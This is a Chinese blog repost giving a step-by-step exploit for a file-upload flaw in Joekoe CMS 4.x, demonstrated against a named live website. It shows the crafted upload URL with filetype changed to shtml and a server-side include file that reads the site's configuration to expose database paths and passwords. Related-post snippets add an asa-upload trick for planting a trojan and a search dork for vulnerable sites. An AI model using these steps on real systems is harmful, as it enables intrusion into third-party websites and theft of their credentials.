Joekoe CMS 4.x 上传漏洞

最新推荐文章于 2024-08-08 17:00:12 发布
最新推荐文章于 2024-08-08 17:00:12 发布
阅读量161 收藏
点赞数
文章标签: shell

from : http://www.siteweavercms.cn/Item/166.aspx

转载请注明:from http://www.siteweavercms.cn

    出于对CMS的研究,发现Joekoe CMS 4.x出现上传漏洞,而且大多数情况下能直接拿数据库地址或数据库数密码。
    为什么上传漏洞不是直接拿SHELL而是那这些呢?哈哈。。。
    别急,下面一步步讲解,这也算是一个值得大家注意的问题。
    以这个站为例:http://www.21suv.net/    本网站基于 Joekoe CMS 4.0 Release 技术架构

    我们来先注册一个用户。
    进入用户中心。
    发布信息。
    发布文章

上传图片,我们在新页打开(或拉一下就可以了)

上传图版地址为:

filetype 就是我们今日的主角
我们改为shtml

http://www.21suv.net/common/upload.asp?channel=article&filetype=shtml&filename=20080806180445k&fileinput=a_pic&formname=&thumbname=&thumbinput=
然后新建一个文本文件,内容如下:
<!-- #include file="http://www.cnblogs.com/common/config/configure.asp" -->

保存为 diy.shtml (名字随便,以shtml为后辍就行)
然后不用说了吧?浏览,上传

直接点击打开,如果页面不显示404,差不多就成功了。
我们在页面上点击右键,查看源码,发现了什么?

是吧。哈哈。。
就到这里。。

weixin_34293059
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
joekoe CMS 4.0 上传漏洞
weixin_30716141的博客
07-30 214
影响版本:joekoe CMS 4.0 详细说明:Joekoe CMS 4.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用...
乔客(joekoe) CMS 4.0 的2个高危漏洞
HackCode的专栏
07-30 772
 1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马了,具体url可以这样common/upload.asp?channel=use2&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinp
再现杰奇网站漏洞环境的三道问题
帅醉了的博客
03-16 308
1.第二项:修改后缀 2.key值在根目录下:key{fd12bd78} 3.找了n久,也没找到路径,还是靠猜出来 密码:admin
Java代码审计初探-JtopCMS文件上传漏洞(CNVD-2021-05471)
BlusKing
04-06 2106
原文发在freebuf:https://www.freebuf.com/vuls/267872.html 漏洞信息 CNVD-ID CNVD-2021-05471 公开日期 2021-02-26 危害级别 高 ([AV:N/AC:L/Au:N/C:C/I:C/A:C]) 影响产品 合肥明靖信息科技有限公司 JTopCMS 4.0.0 ..
乔客Joekoe CMS 4.0.rar
05-25
乔客Joekoe CMS 4.0给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用...
Joekoe CMS v5.0 RC build 20222.rar
07-05
Joekoe CMS 5.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用的...
Joekoe CMS v1.2 SP1-ASP源码.zip
12-15
Joekoe CMS v1.2 SP1是一款基于ASP(Active Server Pages)技术的网站内容管理系统。ASP是一种由微软公司开发的服务器端脚本环境,它允许开发者在网页上动态生成HTML、XML等文档,为创建交互式的Web应用程序提供了...
『乔客在线』Joekoe v6.5.rar
08-30
【标题】"『乔客在线』Joekoe v6.5.rar" 提供的是一个名为 Joekoe 的在线服务平台的版本 6.5 的源代码。Joekoe 可能是一个专门为用户提供各种在线服务或功能的网站平台,比如技术支持、在线咨询、资源分享等。 ...
盐城学生网整站041001版(JOEKOE CMS1.0 SP3).rar
08-30
* 盐城学生网整站程序041001版(joekoe SP3内核) * * 网站: http://www.ycstudent.net * **************************************************************** * Copyright (C) 2004 ycstudent.net All Rights ...
CreateLiveCMSv4.2_SQL_Full
03-02
创力网站内容管理系统全功能版本创力网站内容管理系统全功能版本
JoekoeCMS1.0商业版.rar
08-30
**************************************************************** * * Joekoe CMS 1.0 标准版 * * 版权所有: 乔客在线 * * 程序制作: 乔客 (joekoe,QQ:28755) * 电子邮箱: service@joekoe.com * * 技术支持: http://vip.joekoe.com * * 官方网站: http://www.joekoe.com * http://www.joekoe.net * http://www.topv.com * **************************************************************** * Copyright (C) 2004 Joekoe.com All Rights Reserved. **************************************************************** * * 【 版权声明 】 * * 本程序为共享软体(ShareWare),请勿非法修改,转载,散播或用于 * 其他图利行为,请勿删除版权声明!软件使用注意事项: * * 1.请勿非法COPY本站的收费版本用于其它未注册用户使用! * 发现后将取消您的相关服务,如免费技术支持与免费升级; * * 2.您可以修改本程序,但出现问题本站只作技术支持,不作程序 * 方面的修改;本站只对原版做免费技术支持与免费升级; * * 3.您在使用本程序的过程中m遇到的各种问题m在没有改动的前 * 提下m本站会作出及时的应答处理与解决措施; * * 4.如果可能,请尽量在您的网站做上我们的链接.谢谢! * * 5.非常感谢您注册并使用本程序!感谢您的支持! * **************************************************************** * * 【 安装说明 】 * * 如果您是新用户,请直接将本程序的所有文件上传在任一文件夹下, * 即可正常使用,不用进行任何设置; (可修改图片等) * 默认的管理员用户名和密码都是: joekoe * * 系统默认关闭,请上传后登陆后台点击"核心管理"里操作如下: * * 1.进入"配置管理" - "基本配置",修改"网站目录"一项, * 默认是根目录"/",如在其它目录可为"/new_folder/"; * 2.修改完网站目录后请进入"Skin配置",分别点击第一个Skin, * 进入编辑状态,不进行任何的修改提交一次; * 3.进入"配置管理"中的"基本配置","功能配置","参数配置", * "上传配置","等级配置"等进行个性设置,设置后"备份配置"; * 4.进入"配置管理"中的"基本配置",将"网站状态"设为"开放". * * 经过以上几步您的Joekoe CMS网站系统即可正常运行了. * 如有操作问题可在官方技术支持网站或论坛里提出. * * 数据库默认的为: data_jk/joekoe_data.asp 已经过防下载处理 * * * 需要 iPaying 支付商户请直接与 iPaying 或官方人员联系 * * iPaying 您身边的在线支付专家 http://www.ipaying.com.cn/ * * **************************************************************** * * 【 使用说明 】 * * 1. 除非您很了解 ASP、HTML、CSS、JavaScrpit,否则主程序内容请 * 勿随意修改!如改动后出现错误,请用原始文件覆盖同名文件即可. * * 2. 本站对此程序提供全面的技术支持,如果你在使用中有什么问题, * 请到本站论坛来发问,我们会在第一时间给于回复的. * 本站论坛地址: http://www.joekoe.com/forum.asp * * 3. 如果你在使用这个程序的过程中有什么错误,意见或建议,请及时 * 告诉我,谢谢! * **************************************************************** * * 乔客在线 http://www.joekoe.com * * Copyright (C) 2004 Joekoe.com All Rights Reserved. * **************************************************************
乔客建站专家 Joekoe CMS v5.0 RC build 20222-ASP源码.zip
01-21
ASP源码,压缩包解压密码:www.cqlsoft.com
Joekoe 4.0 CMS 免费版本最基本的修改方法和地方汇总(快速修改成自己的站)
楚雄的专栏
06-04 2146
  Joekoe 4.0 CMS 免费版本最基本的修改方法和地方汇总(快速修改成自己的站) 一,怎么删除或关闭不要的栏目?skin/default/header.html里面去掉菜单然后把
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9358
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
i春秋:通过案例学安全—再现杰奇网站漏洞环境
MyBack
06-01 5804
实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com实验工具:中国菜刀 firebug 实验目的 本课程带领大家学习利用JS验证绕过杰奇CMS1.7上传验证,获取WebShell。课程旨在教会大家提高自身的安全防御意识的同时,学会修补漏洞。 实验思路 找到上传功能尝试上传
后台得到webshell方法大汇总
weixin_33762321的博客
04-25 250
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到we...
杰奇小说连载系统任意文件上传0day
收集盒 Book box
07-06 1653
注册用户进入空间-相册-上传用oprea活firefox修改源码 有个*.jpg *.gif的地方改成*。*就能上传任意文件关键字:inurl:modules/space
UnixBench分数计算与多进程测试
最新发布
qq_39280836的博客
08-08 191
在支持较好的测试机上直接运行RUN脚本即可得到测试结果。
Linux Shell编程--脚本运行与变量置换
小李学不完的博客
08-08 910
Shell脚本运行、修改权限不管脚本有没有x(可执行)权限,都可以执行、sh脚本的绝对路径执行脚本、 bash 脚本的相对路径执行脚本、bash 脚本的绝对路径执行脚本、脚本的绝对路径/相对路径(需要脚本的+x权限)、脚本的相对路径执行脚本可以发现,执行./hello.sh需要x权限】、收回权限再次使用绝对路径执行脚本、source脚本的绝对路径/相对路径执行脚本source执行脚本时,不管脚本有没有x(可执行权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值